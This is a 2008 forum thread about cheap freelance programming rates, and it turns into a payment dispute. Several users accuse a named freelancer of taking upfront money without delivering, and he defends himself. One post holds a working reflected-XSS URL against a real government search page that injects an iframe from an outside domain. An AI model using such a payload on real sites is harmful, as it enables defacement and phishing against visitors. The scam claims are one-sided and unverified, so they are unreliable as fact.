1. Advertising
    y u no do it?

Advertising (learn more)

Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

Starts at just $1 per CPM or $0.10 per CPC.

Buyers beware of cheap rates ....

Discussion in 'PHP' started by vishnups, Apr 2, 2008.

1. stuffradio

stuffradio Peon

Best Answers:
    Good job... the "50% upfront smart talk" is mostly a security thing. Put yourself in the shoe of a programmer,
    if you are doing a huge project, and the client doesn't want to pay till the end... if you only talk online and not in person especially there is a huge risk of the person just running off. For some smaller projects it might not be necessary, but for bigger projects I would want at least some money up front.

stuffradio, May 7, 2008 IP
  2. vishnups

vishnups Banned

Best Answers:
    Preventing Basic XSS Attacks

XSS stands for cross-site scripting. Unlike most attacks, this exploit works on the client side. The most basic form of XSS is to put some JavaScript in user-submitted content to steal the data in a user's cookie. Since most sites use cookies and sessions to identify visitors, the stolen data can then be used to impersonate that user—which is deeply troublesome when it's a typical user account, and downright disastrous if it's the administrative account. If you don't use cookies or session IDs on your site, your users aren't vulnerable, but you should still be aware of how this attack works.

Unlike MySQL injection attacks, XSS attacks are difficult to prevent. Although the attack doesn't involve PHP, you can use PHP to strip user data in order to prevent attacks. To stop an XSS attack, you have to restrict and filter the data a user submits to your site. It is for this precise reason that most online bulletin boards don't allow the use of HTML tags in posts and instead replace them with custom tag formats such as and [linkto].

vishnups, May 18, 2008 IP
  3. scriptaty

scriptaty Banned

Best Answers:
    Sometimes someone can get nice coder for very cheap rate in freelancing sites and here in DP.
    Tis condition happens when someone start bidding in freelancing website and the best option for them will be to give their work at very cheap rate.This can be sometime lucky for some buyers.but except this condition noone can get quality work from cheap in my view too.

scriptaty, May 18, 2008 IP
  4. Ulquiorra

Ulquiorra Peon

Best Answers:
    That's from the dark ages...ever heard of Firebug?

Speaking of cheapness vs. quality, I do all my (quality) work for free - for myself. I do mention that I would do stuff for very cheaply, but I don't really mean it (I will probably never be selling my services).

Validating inputs is good.

Here is a funny & harmless XSS example. Target = cia.gov
    https://www.cia.gov/search?NS-search-page=results&NS-collection=Everything&NS-query=%27}a=/%253Ciframe%20src=http:%252F%252Falqaida.info%20width=100%2525%20height=2000%20frameborder=0%20scroll=no%3E%253C%252F%253E%253C/;document.write(unescape(a.source));{//

Ulquiorra, May 18, 2008 IP
  5. samyak

samyak Active Member

Best Answers:
    Chepa reates doesn't always mean cheap work. I undertake PHP projects(one that requires high skill) at rates as low as $10 per hourbut still provide quality work.

samyak, May 18, 2008 IP
  6. rockbust

rockbust Peon

Best Answers:
    OK, How long should one wait on a project before you start to get worried. Say an upfront full payment for a $550 project that was started almost 2 months ago.

What are your thoughts???

rockbust, Jun 5, 2008 IP
  7. Ulquiorra

Ulquiorra Peon

Best Answers:
    Depends on when the person you hired said it would be ready.

Ulquiorra, Jun 5, 2008 IP
  8. rockbust

rockbust Peon

Best Answers:
    The programmer said it would take about 14 days....

rockbust, Jun 9, 2008 IP
  9. Emperor

Emperor Guest

Best Answers:
    You bester start worrying. That's exactly why I never want to make payments upfront. There is no reason why he should give you what you ordered when he has already received the money. In the end, you the client, are the one taking all the risks.

Emperor, Jun 10, 2008 IP
  10. rockbust

rockbust Peon

Best Answers:
    well here is my sad story. I hired a programmer in January this year and paid him up front to do a php project. I was cheated out of my money.

Then in April I contact Vishnups (yes the programmer that started this thread) and he said he can do the work for me and he was sorry to hear how I was cheated. I told him I was already cheated once by paying in advance but he demanded payment of almost $600 in full. He said he does lots of work for Digital Point customers and will not work any other way.

I paid Vishnu in full in April and he said it would take 2 weeks to complete. I had just completed a custom joomla template in december and he said he was unable to work with this so he would re design from the begining. well now you all can see what Vishnu made at www.pretkd.com it is like a child's project. the original site looked like this www.maaschools.com (this is the custom template i had made).

The work I needed done was supposed to be marketing functions like lead lists and newsletter creations and workflows. creating a point of sale system, adding contracts/recurring billing to a shopping cart system. creating customer functions and reporting all for my martial arts school. Vishnu never even completed a simple template and event script properly and never did any of the other work.

I am so upset that Vishnu has been promising me for 2 months now and has done almost nothing. PLease, please if you think about hiring him please pm me first. his website is www.learnerstv.com . I tried to file a dispute with paypal but they would not accept it after 45 days.

I am going to give my project one more try and if someone out there can help please please let me know. (no money in advance :mad: )

rockbust, Jun 21, 2008 IP
  11. 5ive

5ive Well-Known Member

Best Answers:

Sorry to hear this.. I had some troubles with Vishnups too, i wanted a media player created to my site that didnt pop up in a separate window, and that was what i got anyway and he told me that this was how these players worked, what i wanted was a widget or what ever he told me. Cant remember if he payed me back or not tho, (i think i got it back but not sure)

5ive, Jun 21, 2008 IP
  12. shels

shels Peon

Best Answers:
    Seems like a cooked up story to tarnish the image of a programmer. I had done a highly advanced project with vishnu and he was the best...

shels, Jun 21, 2008 IP
  13. rkquest

rkquest Well-Known Member

Best Answers:
    Aw! So sorry to hear that man. $600 upfront? That's kind of big. If the project is that big you should consider using escrow. You should leave him a bad itrader. From the beginning I had that feeling that this thread was just to impress client. I mean does he really need to post all that stuff about PHP and security when the thread is about "buyers beware of cheap rates"? LOL.

rkquest, Jun 22, 2008 IP
  14. rockbust

rockbust Peon

Best Answers:
    I am glad he had finished your project and you had good results. I waited from my post on june 5th before I even said who's name the programmer was hoping he would finish or refund me. I also waited a long time hoping he would finish his job before trying to complain to paypay.
    I have no reason to tarnish him other that him taking my money. What makes you think it is cooked up?
    do you want my messenger transcripts and my paypal screen shots?

I have used two other developers from DP for a web template and coding it to joomla and both we great. check the records of my posts from last year.

rockbust, Jun 22, 2008 IP
  15. backlinkpal

backlinkpal Peon

Best Answers:
    Report to the admins. Screw up his rep

Get more posts so your affected number of rep goes up and then screw up his reps. If he gave crap to you, you should give crap back to him. God I hate scammers

backlinkpal, Jun 22, 2008 IP
  16. 5ive

5ive Well-Known Member

Best Answers:
    Im not saying he is a scammer, I just had bad experience with him thats all, he sounded as a nice guy and like he knew hes stuff too.. Just dont think im accusing this guy for scamming. im not..

5ive, Jun 22, 2008 IP
  17. joecool6101

joecool6101 Well-Known Member

Best Answers:
    I hired him 2+ months back i guess it was.. he told me 45 days for completetion.. After about 30 days i contacted him he showed me the site with unlimited amounts of bugs and as agreed orginally i paid the remaining amount of money to him.

Now its been 70ish day and have not heard a word from him in almost 2 weeks. I am not sure if i've been scammed or whats the deal. If he thinks he can pull shit like this on me. Then i'll be calling his local authorities i dont stand for this injustice, DP has become a scam fest and its now impossible to do deals here!

There are not very many people that have been on here as long as i have and can say they have no lost 1+K from the pricks here.. what do admins do? put up more rules but dont actually do anything to the scammers. Seems as if they dont mind what happends to there members!

Vishnu, please send my site files pronto.

Thanks.

joecool6101, Jun 22, 2008 IP
    5ive likes this.
  18. 5ive

5ive Well-Known Member

Best Answers:
    He has not been online here for couple of days but would be nice to hear what he has to say.. And joecool6101 I have not been here so long but already been screwed for like $500 or something.. This forum needs to make the BST section payed like SitePoint..

5ive, Jun 22, 2008 IP
  19. vishnups

vishnups Banned

Best Answers:
    Hi all,

Sorry for the late reply as I was out of station for the past 20 days due to unexpected reasons. I had informed all my clients that I will be out of station. And my journey was totally unexpected. (Scanned copies of my travel tickets can be provided).

Regarding the accusation by Rockbust, all of you should have noted that he was having issues with the previous programmer too...I was coding his admin module, even though I was traveling. He never checks the files I have uploaded to his server and makes blind accusations. It was really unfortunate. And he requires more modules that what he had originally agreed upon for $600....I case of Joecool, We had originally agreed upon for 2 months for completion. I had shown him the demo and he was satisfied and made the second part of the payment. It was only 80% complete and there was only a bug in the image upload module..Please remember that it was not finished...and he is now calling me a scammer..I was showing the demo on my test server and He has not yet provided his server details for upload too..And calling me a scammer....Am I correct ???

Please understand that I am also a human being and certain unexpected events occurred which required me to travel long distances and could not have been avoided...I have numerous clients at DP and nobody has called me a scammer...Everybody who has dealt with me knows that I work right from morning 8-00 till 12-30 at night and I will be online most of the time and has finished the projects ahead of schedule...

Now it is upto all of you to decide whether I am a scammer or not. If all of you feel that I am a bad guy, I do not wish to be a member at DP too...But my request to all is to not make accusations without understanding the real facts...

vishnups, Jun 23, 2008 IP
  20. Ulquiorra

Ulquiorra Peon

Best Answers:
    I know it's not my place to do this, but someone is going to and it might as well be me. Sorry vishnups, I've just been playing too much Phoenix Wright and it's just too much fun.

So that implies you did not have access to the internet, which would explain a late reply.

Which means you did have access to the internet. Blatant contradiction here.

Let's read this thread from the top down again, shall we?

Sounds like an escape plan to me.

Once again, I have no problems with vishnups or anything, just dissecting his story because I'm bored. I do have to say one thing though: a freelancer should only pick up jobs when he/she knows there will be no unexpected travels or unplanned getaways.

Ulquiorra, Jun 23, 2008 IP